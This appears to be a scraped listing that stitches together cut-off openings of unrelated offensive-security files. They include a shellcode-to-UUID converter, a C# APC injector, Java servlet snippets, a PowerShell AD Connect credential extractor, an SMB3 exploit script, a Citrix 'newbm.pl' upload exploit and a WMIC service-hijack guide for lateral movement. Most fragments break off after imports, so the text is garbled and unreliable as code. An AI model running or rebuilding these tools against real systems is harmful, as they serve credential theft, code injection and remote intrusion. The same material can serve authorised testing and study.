| from uuid import UUID | |
| import os | |
| import sys | |
| # Usage: python3 binToUUIDs.py shellcode.bin [--print] | |
| print(""" | |
| ____ _ _______ _ _ _ _ _____ _____ | |
| | _ \(_) |__ __| | | | | | | |_ _| __ \ | |
| | |_) |_ _ __ | | ___ | | | | | | | | | | | | |___ |
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
| //Author:fnmsd | |
| //Blog:https://blog.csdn.net/fnmsd | |
| import java.io.PrintWriter; | |
| import java.lang.reflect.Field; | |
| import java.lang.reflect.InvocationTargetException; | |
| import java.lang.reflect.Method; | |
| import java.util.HashSet; | |
| import java.util.Scanner; |
| //Author:fnmsd | |
| //Blog:https://blog.csdn.net/fnmsd | |
| import javax.servlet.http.HttpServletRequest; | |
| import javax.servlet.http.HttpServletResponse; | |
| import java.lang.reflect.Field; | |
| import java.util.HashSet; | |
| import java.util.Scanner; | |
| public class a { |
| Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)" | |
| Write-Host "`t[ Updated to support new cryptokey storage method ]`n" | |
| $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync" | |
| try { | |
| $client.Open() | |
| } catch { | |
| Write-Host "[!] Could not connect to localdb..." | |
| return |
| #define AssemblyDCStart_V1 155 | |
| #define MethodLoadVerbose_V1 143 | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <wbemidl.h> | |
| #include <wmistr.h> | |
| #include <evntrace.h> | |
| #include <Evntcons.h> |
| #!/usr/bin/env python | |
| import argparse | |
| import string | |
| import sys | |
| from impacket import nmb | |
| from impacket.smb3 import SMB2_COMPRESSION_TRANSFORM_HEADER, SMB3, SMB2_DIALECT_311, SMB2_NEGOTIATE_SIGNING_REQUIRED, \ | |
| SMB2_NEGOTIATE_SIGNING_ENABLED, STATUS_SUCCESS, SMB2_DIALECT_30, \ | |
| SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, SMB2_NEGOTIATE, \ | |
| SMB2Negotiate, SMB311ContextData, SMB2NegotiateContext, SMB2_PREAUTH_INTEGRITY_CAPABILITIES, \ |
| import requests | |
| import sys | |
| import time | |
| append_value = str(time.time()) | |
| print "# By 0x09AL - MDSec ActiveBreach \n" | |
| def upload_file(url,payload): | |
| endpoint = url + "/vpns/portal/scripts/newbm.pl" |
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be more convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've run our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |